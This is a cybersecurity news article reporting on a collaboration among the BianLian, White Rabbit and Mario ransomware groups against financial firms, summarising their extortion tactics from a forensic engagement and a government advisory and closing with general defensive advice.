Collaboration among three major ransomware groups, collectively known as the Cyber-Extortion Trinity (BianLian, White Rabbit, and Mario), recently surfaced as they joined forces to target publicly traded financial services companies.
A Rare Phenomenon: Joint Ransomware Attacks
While joint ransomware attacks are not common, the increasing involvement of Initial Access Brokers (IABs) with various Dark Web groups suggests a potential rise in such incidents.
The identification and dismantling of cybercriminal networks by law enforcement may inadvertently encourage collaboration, as displaced members of these groups might be more inclined to cooperate with rivals.
A significant revelation came from Resecurity, Inc. (USA), during a recent Digital Forensics & Incident Response (DFIR) engagement with a law enforcement agency (LEA) and a prominent investment firm in Singapore.
White Rabbit Emerges: Targeting Financial Institutions
White Rabbit, a ransomware family, gained attention after targeting a U.S. bank in December 2021 and subsequently focusing on financial institutions (FIs).
The threat actors behind White Rabbit employed a strategy of allowing victims a brief window, typically four to five days, to pay the ransom. Their ransom note not only threatened victims with reporting to oversight authorities but also exposed businesses to potential fines and GDPR enforcement if they failed to make the extortion payment promptly.
Additionally, the White Rabbit’s ransom notes consistently mentioned the Ransomhouse Telegram Channel.
BianLian’s Target: Critical Infrastructure Sectors in the U.S.
According to a CISA-ACSC advisory, since June 2022, the cybercriminal group BianLian has been targeting crucial infrastructure sectors in the United States, employing legitimate Remote Desktop Protocol (RDP) credentials for access. The group performs credential harvesting and discovery using open-source tools and command-line scripting, and exfiltrates victim data via FTP, Rclone, or Mega.
Utilizing a double-extortion method, BianLian first encrypts victim systems after exfiltrating data, then threatens to release the data unless a ransom is paid.
MarioLocker: Rendering Files Inaccessible
The ransomware variant MarioLocker, known for rendering files inaccessible, was identified in compromised computers. Ransom notes with a signature linked to the Mario ransomware consistently referred to the RansomHouse Telegram Channel.
The evolving ransomware threat landscape poses a significant challenge for organizations, emphasizing the critical importance of a proactive cybersecurity strategy. Recommendations include regular system updates, robust threat detection systems, and comprehensive employee training to recognize and thwart social engineering attacks.
